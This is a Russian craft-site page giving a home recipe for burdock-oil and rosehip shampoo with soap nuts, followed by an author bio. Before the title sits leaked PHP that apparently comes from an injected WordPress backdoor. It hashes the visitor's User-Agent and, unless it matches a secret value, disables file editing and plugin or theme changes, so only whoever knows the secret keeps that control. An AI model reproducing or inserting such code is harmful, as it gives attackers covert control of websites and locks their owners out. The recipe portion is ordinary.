if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как сделать репейный шампунь своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как сделать репейный шампунь своими руками

Домашний шампунь это не только выгодно, но и очень полезно как для кожи головы, так и для самих волос. Читайте что понадобится для его изготовления

Домаш­ний шам­пунь это не толь­ко выгод­но, но и очень полез­но как для кожи голо­вы, так и для самих волос.

Для изготовления вам понадобиться:

  • пло­ды шипов­ни­ка измель­чен­ные (2 ст.л.);
  • репей­ное мас­ло (1 ст.л.);
  • мыль­ный орех (50гр).

Приготовление

Для начи­на­ю­щих этот рецепт очень под­хо­дит. Ведь он доста­точ­но прост. Для изго­тов­ле­ния шам­пу­ня необ­хо­ди­мо измель­чен­ные пло­ды шипов­ни­ка залить водой (1 ста­кан) и на сла­бом огне дове­сти до кипе­ния. Затем 20 минут дан­ная жид­кость долж­на насто­ять­ся. В полу­чен­ный настой ком­нат­ной тем­пе­ра­ту­ры необ­хо­ди­мо доба­вить репей­ное мас­ло. Все это необ­хо­ди­мо хоро­шо пере­ме­шать и через 15 минут отцедить.

Применение

Сухие воло­сы необ­хо­ди­мо про­мыть насто­ем и накрыть голо­ву поли­эти­ле­ном. Это может быть обык­но­вен­ный паке­тик. Свер­ху голо­ву необ­хо­ди­мо покрыть поло­тен­цем. Таким обра­зом полез­ные веще­ство мак­си­маль­но впи­та­ют­ся в кожу голо­вы и воло­сы. Через минут 15 поло­тен­це и пакет необ­хо­ди­мо снять, голо­ву про­мыть теп­лой водой. Поль­зо­вать­ся таким насто­ем мож­но до 2‑х раз в неделю.

Совет

Из это­го настоя мож­но сде­лать шам­пунь. Для это­го необ­хо­ди­мо залить 50 гр мыль­ных оре­хов водой и варить в тече­ние 20 минут. После охла­жде­ния жид­кость из-под оре­хов необ­хо­ди­мо сме­шать с насто­ем. Исполь­зо­вать мож­но как обык­но­вен­ный шампунь.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!